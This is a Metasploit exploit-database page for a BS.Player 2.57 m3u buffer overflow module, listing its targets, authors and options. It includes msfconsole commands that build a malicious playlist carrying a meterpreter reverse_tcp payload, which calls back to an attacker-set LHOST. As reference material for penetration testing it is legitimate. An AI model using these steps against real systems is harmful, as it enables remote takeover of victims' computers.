BS.Player 2.57 Buffer Overflow (Unicode SEH) | Metasploit Exploit Database (DB)

BS.Player 2.57 Buffer Overflow (Unicode SEH)

This module exploits a buffer overflow in BS.Player 2.57. When the playlist import is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.

Search Other Modules


Exploit Rank

  • Normal

Exploit Authors

  • C4SS!0 G0M3S < >
  • Chris Gabriel < >

Vulnerability References


Exploit Targets

  • 0 - Windows XP (default)
  • 1 - Windows 7

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/fileformat/bsplayer_m3u
msf exploit(bsplayer_m3u) > show payloads
msf exploit(bsplayer_m3u) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(bsplayer_m3u) > set LHOST [MY IP ADDRESS]
msf exploit(bsplayer_m3u) > exploit


Exploit Module Options

FILENAME The file name. (default: msf.m3u)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
DynamicSehRecord Generate a dynamic SEH record (more stealthy)
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session